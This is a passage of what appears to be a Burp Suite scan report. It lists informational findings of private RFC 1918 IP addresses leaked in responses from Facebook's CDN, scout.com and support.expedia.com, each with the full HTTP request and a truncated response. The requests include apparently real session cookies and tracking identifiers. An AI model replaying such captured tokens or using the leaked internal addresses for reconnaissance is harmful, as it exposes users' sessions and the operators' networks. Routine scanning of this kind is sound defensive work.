Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=Jwu5zEjpq0Q-W60ACS9; __utmz=202704078.1303516031.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; RefId=0; BrandId=0; SessionBrandId=0; __utma=202704078.454375544.1303509265.1303522301.1304728142.4; __utmc=202704078; __utmb=202704078.2.9.1304728228796

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:30:36 GMT
Content-Type: text/html
Content-Location: http://scouthoops.scout.com/StaticPages/scouthoops/index.html
Last-Modified: Fri, 06 May 2011 17:40:15 GMT
Accept-Ranges: bytes
ETag: "789097a814ccc1:67b"
Server: Microsoft-IIS/6.0
Server: Scoutweb10
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 124213

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
<!--
Fetch info:
Source: 192.168.10.106
URL: http://192.168.10.106/a.z?s=75&p=1&noredir=1&fromprefetch=1
By:
Date: Fri May 6 10:40:15 PDT 2011
-->
...[SNIP]...
<!--
v. 0.0.0.12737
Server Date: Friday, May 06, 2011 10:40:14 AM
URL: http://192.168.10.106:80/Legacy/a.z?s=75&p=1&noredir=1&fromprefetch=1
Server IP: 192.168.20.63, CEDAR
Page Execution Time: 305 ms
-->
...[SNIP]...
28.19. http://static.ak.connect.facebook.com/images/connect_sprite.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.connect.facebook.com
Path:   /images/connect_sprite.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/connect_sprite.png HTTP/1.1
Host: static.ak.connect.facebook.com
Proxy-Connection: keep-alive
Referer: http://allatsea.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: image/png
X-FB-Server: 10.33.4.130
X-Cnection: close
Content-Length: 1916
Cache-Control: max-age=37830
Expires: Sat, 07 May 2011 07:37:17 GMT
Date: Fri, 06 May 2011 21:06:47 GMT
Connection: close
X-N: S

.PNG
.
...IHDR...'.........b_Ci....PLTE...Oj.r..y..z...5nEa.z.....{..|........ay.......F_...................{..m........D^....@Z.B[....E^.C].......@Z.p..Le....p...........C].B\.............A[.......
...[SNIP]...
28.20. http://static.ak.fbcdn.net/connect.php/js/FB.Share  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect.php/js/FB.Share

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect.php/js/FB.Share HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://allatsea.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
If-None-Match: "c3c4f72e993df46ab5cbcea6a8167d19"

Response

HTTP/1.1 200 OK
ETag: "e50821f4688858e3218088e45136c3e7"
Vary: Accept-Encoding
Content-Type: application/x-javascript; charset=utf-8
X-FB-Server: 10.53.39.75
X-Cnection: close
Cache-Control: public, max-age=401
Expires: Fri, 06 May 2011 21:13:23 GMT
Date: Fri, 06 May 2011 21:06:42 GMT
Connection: close
Content-Length: 6584

/*1304653588,171255627,JIT Construction: v374976,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...
28.21. http://static.ak.fbcdn.net/connect/xd_proxy.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect/xd_proxy.php?version=0 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?api_key=131538103586818&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3ee84d5c%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ff9e2604f4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Ffacebook.com%2Fexpedia&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=true&width=340
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.30.146.196
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=202
Expires: Fri, 06 May 2011 22:37:05 GMT
Date: Fri, 06 May 2011 22:33:43 GMT
Connection: close
Content-Length: 3017

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...
28.22. http://static.ak.fbcdn.net/connect/xd_proxy.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect/xd_proxy.php?version=0 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?api_key=131538103586818&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df36e65b24c%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ffa054297%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Ffacebook.com%2Fexpedia&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=true&width=340
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.138.69.184
Vary: Accept-Encoding
Cache-Control: public, max-age=510
Expires: Sat, 07 May 2011 11:33:35 GMT
Date: Sat, 07 May 2011 11:25:05 GMT
Connection: close
Content-Length: 3017

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...
28.23. http://static.ak.fbcdn.net/connect/xd_proxy.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect/xd_proxy.php?version=0 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?api_key=131538103586818&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df310e73f44%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ff7077cb88%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Ffacebook.com%2Fexpedia&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=true&width=340
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.138.69.186
Vary: Accept-Encoding
Cache-Control: public, max-age=1441
Expires: Fri, 06 May 2011 22:59:23 GMT
Date: Fri, 06 May 2011 22:35:22 GMT
Connection: close
Content-Length: 3017

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...
28.24. http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/w8K2nfDzJmR.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/y8/r/w8K2nfDzJmR.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/y8/r/w8K2nfDzJmR.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/media/set/?set=pa.82321587255
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 02 May 2011 02:09:37 GMT
X-FB-Server: 10.30.146.197
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=31135223
Expires: Tue, 01 May 2012 02:22:10 GMT
Date: Fri, 06 May 2011 17:41:47 GMT
Connection: close
Content-Length: 9376

/*1304302958,169775813*/

.fbPhotosTheaterActions a{display:block;margin-bottom:5px}
.fbUndoSpamReport a.fbUndoSpam{display:inline;margin-bottom:0}
.fbPhotosTheaterActionsTag .taggingOn,
.taggingMode
...[SNIP]...
28.25. http://static.ak.fbcdn.net/rsrc.php/v1/yO/r/a9SKJ-iPf9Q.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yO/r/a9SKJ-iPf9Q.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yO/r/a9SKJ-iPf9Q.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/media/set/?set=pa.82321587255
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Wed, 27 Apr 2011 22:39:57 GMT
X-FB-Server: 10.30.146.197
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=31170806
Expires: Tue, 01 May 2012 12:15:13 GMT
Date: Fri, 06 May 2011 17:41:47 GMT
Connection: close
Content-Length: 2885

/*1304338549,169775813*/

.bulkTaggerTypeahead{width:210px}
.bulk_tagger_body .bulkTagIcon{margin-top:6px;margin-right:7px}
.bulk_tagger_body .bulkTagStatus{display:inline-block;padding-top:4px}
.bulk
...[SNIP]...
28.26. http://static.ak.fbcdn.net/rsrc.php/v1/yZ/r/pnnjl6ACZdc.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yZ/r/pnnjl6ACZdc.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yZ/r/pnnjl6ACZdc.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/SocialFollow
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Thu, 25 Feb 2010 14:35:38 -0800
X-Powered-By: HPHP
X-FB-Server: 10.138.69.185
Vary: Accept-Encoding
Cache-Control: public, max-age=25505840
Expires: Sat, 25 Feb 2012 22:36:23 GMT
Date: Fri, 06 May 2011 17:39:03 GMT
Connection: close
Content-Length: 261

/*1298673338,176833977*/

.profile-platform-pane{overflow:hidden;padding-right:0;position:relative;width:520px}
.profile-platform-pane pane-content{overflow:hidden}
.profile .app_tab{position:relative
...[SNIP]...
28.27. http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/xmrVYX_SMcv.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/y_/r/xmrVYX_SMcv.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/y_/r/xmrVYX_SMcv.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/SocialFollow
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Wed, 02 Mar 2011 18:57:01 GMT
X-FB-Server: 10.30.146.196
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=28715640
Expires: Tue, 03 Apr 2012 02:13:01 GMT
Date: Fri, 06 May 2011 17:39:01 GMT
Connection: close
Content-Length: 368

/*1301883138,169775812*/

.sp_b85ka0{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/z0/r/St1KW-mt4Dd.png);background-repeat:no-repeat;display:inline-block;height:16px;width:16px}
.sx_ab60
...[SNIP]...
28.28. http://static.ak.fbcdn.net/rsrc.php/v1/z7/r/UvyvLtJTQzO.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/z7/r/UvyvLtJTQzO.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/z7/r/UvyvLtJTQzO.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/media/set/?set=pa.82321587255
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 111
Content-Type: image/png
Last-Modified: Sun, 14 Mar 2010 12:51:28 -0700
X-Powered-By: HPHP
X-FB-Server: 10.30.148.189
X-Cnection: close
Cache-Control: public, max-age=26964684
Expires: Tue, 13 Mar 2012 19:53:12 GMT
Date: Fri, 06 May 2011 17:41:48 GMT
Connection: close

.PNG
.
...IHDR...    ...........T(....PLTEs.Q....N......tRNS.@..f....IDAT..c.``.a`.c`.g`.......a.V......IEND.B`.
28.29. http://static.ak.fbcdn.net/rsrc.php/v1/zU/r/bSOHtKbCGYI.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/zU/r/bSOHtKbCGYI.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/zU/r/bSOHtKbCGYI.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://allatsea.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 101
Content-Type: image/png
Last-Modified: Mon, 15 Mar 2010 07:59:03 -0700
X-Powered-By: HPHP
X-FB-Server: 10.30.148.193
X-Cnection: close
Cache-Control: public, max-age=27021119
Expires: Wed, 14 Mar 2012 14:58:45 GMT
Date: Fri, 06 May 2011 21:06:46 GMT
Connection: close

.PNG
.
...IHDR.............+.<....,IDAT.[c.u...7..b`.l. 1.    ...P$`.(...p    tA..6..|..........IEND.B`.
28.30. http://static.ak.fbcdn.net/rsrc.php/v1/ze/r/tgCjNDQG0qU.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/ze/r/tgCjNDQG0qU.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/ze/r/tgCjNDQG0qU.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/SocialFollow
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 1038
Content-Type: image/png
Last-Modified: Sat, 27 Feb 2010 19:22:42 -0800
X-Powered-By: HPHP
X-FB-Server: 10.30.146.197
X-Cnection: close
Cache-Control: public, max-age=25695801
Expires: Tue, 28 Feb 2012 03:22:22 GMT
Date: Fri, 06 May 2011 17:39:01 GMT
Connection: close

.PNG
.
...IHDR.......N......b.,....IDATX..Y=h.A..fs.5..@....4B.......'NR..I....].+. (.9A.1..........;.......:...>.w......\r.?.....f.y.{....#"$..........^...9...@&a@....-
.X=..W......1V.I....f.....
...[SNIP]...
28.31. http://support.expedia.com/app/answers/list/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://support.expedia.com
Path:   /app/answers/list/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /app/answers/list/ HTTP/1.1
Host: support.expedia.com
Proxy-Connection: keep-alive
Referer: http://support.expedia.com/app/home/uurl/http%3A%2F%2Fwww.expedia.com%2Fpub%2Fagent.dll%3Fqscr%3Dflex%26subm%3D1%26city%3DAUS%26citd%3DDTW%26date1%3D%26mnth%3D5%2F1%2F2011%26rgst%3D1%26rged%3D10%26fxst%3D0%26load%3D1%26cAdu%3D1%26rfrr%3D-429%3F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; s1=`user=v.8,0,EX01528414FE$F4$B5202000X$27$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$2302!50$EDIs$A8$FB$27$95$E4$82$AB$89$FB!e02000`131; p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`linfo=v.4,|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`airp=v.1,AUS`gacct=v.1,1,215819496`188; cp_session=UylSJgVxACRUPAJyAGoEaQRCDBEAA1FsA3EJOlZ2AngBcwR4ACYFPAF7WS1QIlIhACADPQd2VW4AJgM5ASBUdARyXyIBMAUSBHEIMwZEBCJTYFJCBXUAcVRxAn4ANgR9BHAMOwAxUWwDZAl%2FVjcCOwE8BCgANgVAAXBZelA1UnEAYAMXBzVVMwBhAz8BIFQuBGZfawFvBXYEZwhHBnMEdFMxUnYFJwA1VEICNgA%2FBGAEeAx7AGdRMwN2CSRWNgI5AXQEPgBABTcBJVk9UGFSNwA7AyUHLVVxADcDFQEVVFUEUV8iATEFZQQ3CGgGdgRjU3dSNwVGAEJUUgIHAHYENwQ2DDoANFFxA2AJYFZxAmcBFQQoADYFMAFtWWFQI1I8AHcDYgcQVWEAIQNjARJUMQQnXzUBRQVhBGQIMAYzBCJTYFIyBXAAYVR1AiQAdgQ2BEQMbwBwUTcDMwkjVjMCMQE1BCgANwVCATFZP1ByUmYAZAM3ByxVJwBwA3QBZ1REBDJfIgExBWUEOAhuBmMEY1N3UjcFRgA3VCMCYgBlBGYEQQw6ACBRIAM2CRVWZQJxAWMEOwB2BWABcll9UHJSZwAWA3wHYFVmAD0DdAFnVEYEIF96AS8FcQQxCCMGOAQlUw5SKwVxAGNUdQIjADoEagRuDAIAelFJAzYJH1YkAg4BEgQ1ADEFZAFFWUVQB1ICAD8DPQdkVTUAcwNsAWlUIgR%2F; supportsurvey=1; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3DundefinedtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%2526function%2520%2528%2529%257Bvar%2520a%253D%255B%2522%257B%2522%255D%252Cb%252Ck%252Cv%253Bfunction%2520p%2528s%2529%257Bif%2528b%2529%257Ba.push%2528%2522%252C%2522%2529%253B%257D%250Aa.push%2528k.toJSONString%2528%2529%252C%2522%253A%2522%252Cs%2529%253Bb%253Dtrue%253B%257D%250Afor%2528k%2520in%2520this%2529%257Bif%2528this.hasOwnProperty%2528k%2529%2529%257Bv%253Dthis%255Bk%255D%253Bswitch%2528typeof%2520v%2529%257Bcase%2522object%2522%253Aif%2528v%2529%257Bif%2528typeof%2520v.toJSONString%253D%253D%253D%2522function%2522%2529%257Bp%2528v.toJSONString%2528%2529%2529%253B%257D%257Delse%257Bp%2528%2522null%2522%2529%253B%257D%250Abreak%253Bcase%2522string%2522%253Acase%2522number%2522%253Acase%2522boolean%2522%253Ap%2528v.toJSONString%2528%2529%2529%253B%257D%257D%257D%250Aa.push%2528%2522%257D%2522%2529%253Breturn%2520a.join%2528%2522%2522%2529%253B%257D%253DtoJSONString%3B

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:40:25 GMT
Server: Apache
P3P: policyref="http://support.expedia.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: cp_session=AnhUIAB0BSEDa1cnBW8Gaw9JVktdXlVoB3UOPVBwVC5VJwF9UHYAOVctA3cCcAh7AyMFO1IjBzxSdFVvU3JXd1MlCXQFNAYRViMEP1UXACYCMVREAHAFdAMmVysFMwZ%2FD3tWYV1sVWgHYA54UDFUbVVoAS1QZgBFVyYDIAJnCCsDYwURUmAHYVIzVWlTclctUzEJPQVrBnVWNQRLVSAAcAJgVHAAIgUwAxVXYwU6BmIPc1YhXTpVNwdyDiNQMFRvVSABO1AQADJXcwNnAjMIbQM4BSNSeAcjUmVVQ1NHV1ZTBgl0BTUGZlZlBGRVJQBnAiZUMQBDBUcDBVdSBXMGNQ89VmBdaVV1B2QOZ1B3VDFVQQEtUGYANVc7AzsCcQhmA3QFZFJFBzNSc1U1U0BXMlNwCWMFQQZiVjYEPFVgACYCMVQ0AHUFZAMiV3EFcwY0D09WNV0tVTMHNw4kUDVUZ1VhAS1QZwBHV2cDZQIgCDwDZwUxUnkHdVIiVSJTNVdHU2UJdAU1BmZWagRiVTAAZwImVDEAQwUyA3RXNwVgBmQPSlZgXX1VJAcyDhJQY1QnVTcBPlAmAGVXJAMnAiAIPQMVBXpSNQc0Um9VIlM1V0VTdwksBSsGclZjBC9VawAhAl9ULQB0BWYDIld2BT8GaA9lVlhdJ1VNBzIOGFAiVFhVRgEwUGEAYVcTAx8CVQhYAzwFO1IxB2dSIVU6UztXIVMo; path=/
RNT-Time: D=1438358 t=1304721625654912
RNT-Machine: 02
Vary: Accept-Encoding
X-Cnection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 95305


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:rn="http://schemas.rightn
...[SNIP]...
<!--TS (1/0[CID=0]) compress=1,3 log=0 BR:, Srvr=10.186.8.139, Req=15:40:25(:754), Rsp=15:40:27(:020), hash=37(0x157d5588) ET=1281ms Dur=1265ms Mif=0 -->
...[SNIP]...
28.32. http://support.expedia.com/app/home/uurl/http%3A%2F%2Fwww.expedia.com%2Fpub%2Fagent.dll%3Fqscr%3Dflex%26subm%3D1%26city%3DAUS%26citd%3DDTW%26date1%3D%26mnth%3D5%2F1%2F2011%26rgst%3D1%26rged%3D10%26fxst%3D0%26load%3D1%26cAdu%3D1%26rfrr%3D-429%3F  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://support.expedia.com
Path:   /app/home/uurl/http%3A%2F%2Fwww.expedia.com%2Fpub%2Fagent.dll%3Fqscr%3Dflex%26subm%3D1%26city%3DAUS%26citd%3DDTW%26date1%3D%26mnth%3D5%2F1%2F2011%26rgst%3D1%26rged%3D10%26fxst%3D0%26load%3D1%26cAdu%3D1%26rfrr%3D-429%3F

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /app/home/uurl/http%3A%2F%2Fwww.expedia.com%2Fpub%2Fagent.dll%3Fqscr%3Dflex%26subm%3D1%26city%3DAUS%26citd%3DDTW%26date1%3D%26mnth%3D5%2F1%2F2011%26rgst%3D1%26rged%3D10%26fxst%3D0%26load%3D1%26cAdu%3D1%26rfrr%3D-429%3F HTTP/1.1
Host: support.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/pub/agent.dll?qscr=flex&subm=1&city=AUS&citd=DTW&date1=&mnth=5/1/2011&rgst=1&rged=10&fxst=0&load=1&cAdu=1&rfrr=-429
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
